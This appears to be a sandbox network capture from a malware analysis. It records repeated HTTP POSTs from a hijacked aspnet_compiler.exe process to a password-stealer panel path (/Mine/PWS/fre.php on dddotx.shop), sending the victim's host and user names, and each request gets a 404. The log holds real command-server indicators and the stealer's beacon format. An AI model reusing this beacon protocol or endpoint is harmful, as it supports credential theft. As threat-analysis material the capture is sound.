Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49757	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:23.205740929 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:23.211146116 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:24.412775993 CEST	774	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ciScChgOKV53j9TS3Z3ZHBFJdj1KdJt5nFbAlbeocgkV5PqB9RC%2BVHXaqmdoxIfxQ2eZwd25%2F1YNoiZzbZrq0wO1T9IhXyk2UVb1G%2Bi5SdIPvaYq4p7q8EjDBio6ow%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad8fe6fc23177-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1384&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49763	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:24.555114031 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:24.561675072 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:25.588660002 CEST	774	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=25RhSey%2FcM%2BswRdxG1LMHPNnjkRvLpDD5pIkJy1uHxYZwdLngLIuKBn6ZqOb9uW69EUGrO%2FtNqkVL9uzJlCvKrWr19pfk2EZOlVRRJ13VeaN3Xf4V9SWDWbbnb2ppw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad906ddf33587-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1027&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49774	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:25.740081072 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:25.747925043 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:26.637290955 CEST	776	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=za4JpOlF%2BOgek7zH6Hn0LC5oUB3J%2FP7D27N4YmPUBUaMmWtaDYJcE3yngqA3ZwkiGepz%2FGHtMnz9cjJmuUP3yNi%2Fcmp9DjGPmmADDkwdUrTQOf1wKeLCedVdbVEC1A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad90e4a42eb16-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1342&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49780	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:26.789365053 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:26.794869900 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:27.668710947 CEST	774	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5K7iotL3nAhCSPYeShaXClHk1grtDcAKT0KQvzyS19YO3ayDZ04vy0aT1%2FOrjxGa4u5hhBh2jrsiScbn5D%2FY0CMpJHbPF1HxsgP3Oojd54zA9%2F5MHLSdjcOPU9wTng%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad914dcb44686-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49786	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:27.819351912 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:27.825460911 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:28.717905045 CEST	774	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e2M2Qre%2B6VFO1EHq7YppP8IiDqk862QfLwmiSfExtL0%2BArSrm3a00JPHe6jtDyrYl8%2FDcXU9BC8x0vTkEPGP4hEgqL8etDNeX14uLFcxTTeUJvyg6vCqgBfDEtS9Ug%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad91b3a426c4f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1960&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49792	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:28.873809099 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:28.879211903 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:29.781430006 CEST	774	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eu308C6Ct2CohWKQtNacv2V7v4cXH4kloVKKMFPmpdHE1GsJlXiHSmjNZlMZ%2BkJdKPvC3SeyryLD4ubhiX0uN0XLaua9EzLpvxhATYhI0%2FGy2aRjlCoeKFlh%2FbMnWw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad921eb92e836-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2232&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49798	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:29.931011915 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:29.936630011 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:30.857218981 CEST	774	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Os%2B5AK2Olpaw6rtRTHBzN5kgkEFg%2BLu7s2gKfOY6HJKS9C0iulTwmZnCPX4hTssvbiJLTtsNOMaHsPZnpG%2BeE8fxOMZKOMkNyWS1O2jol9lvhQw3bfx8MQLuqXYXCQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad9286fe54785-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1237&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49806	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:31.009783030 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:31.015360117 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:33.136374950 CEST	773	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=50QhMYSqwXKbd4dAt2So0M3A8SNMYi92MLmJgic%2FSypVUrpSlvIXI2bvVXuV4mIxVpEJBj1%2FnZLAKjVwk%2BppjQ8Ccb1xaLilHo79niPKnuvRwyJYhZ1Aix68fHnjqg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad92f2f5f8d2c-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1644&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=81&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49820	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:33.293499947 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:33.298933029 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:34.213545084 CEST	778	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4pLn2gnsA6xxnF7szO%2BWWnraqx%2FYya5W3HTHBbRo0np%2FS55TYuV5o3fEg%2Bg58N3RUxpzZs1aErMpK4CZa52IP8HuPVdXlQ9GUYlEl3rngImI4rwhl%2BTMHF0VKhDKfg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad93d7a7b6b3c-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1938&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49826	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:34.366801977 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:34.372256041 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:35.272162914 CEST	774	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xZHLcL%2BmGZTykGDUb7wogaVViCdsHa3QnMB46GUt9xRjhaa0Z6sQe4GYLpeXxJVqgTt9yaHy1iN4hQAGHxJI%2F17AfbOjC9mS7M3GHwNwI3psoi3mrngZ06%2BsAYGqJQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad9442cf33474-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1155&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49832	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:35.413671970 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:35.421422958 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:37.391191006 CEST	768	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pYfuQWh1ubE6HwrD2PVFy8pPLBrP7fVwJMfundcELeNFsjHovegYWfIoCKNFtIF4ryZGybLO5WeZSF5rQRWVsBmrCctHk0UfobPkzlLNVBEOxRMebi2g86kOzRudug%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad94afa724605-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1142&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49845	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:37.539633989 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:37.545567989 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:38.478197098 CEST	772	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tLQk0UjL3x%2BLzVyi4coA%2FhX83SNnECLY0k09LvGrIcXxb2cwJIO5DWHA2MLtxu3DKYjSEUWyIz8YRcgfg6qLVpG6cmkwhVZREISEaw7LeXWhYLoGU9YtzHKSt9abOQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad9582e8145f9-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1169&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49853	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:38.632541895 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:38.638010979 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:39.504625082 CEST	776	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hsV8TR%2BGBQet%2F1qH20FzvWqGxR8lKwDM9sq1v3PhCQFYDeaIRhOGE990FTP2VyPBsbWFdZ28zWushaUPQKNtsN0fvg%2FEGlzWWl1qIUKteRsf8uW1V0%2FHsm9HEi0vmQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad95ecc776c64-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1880&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49859	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:39.652800083 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:39.658318043 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
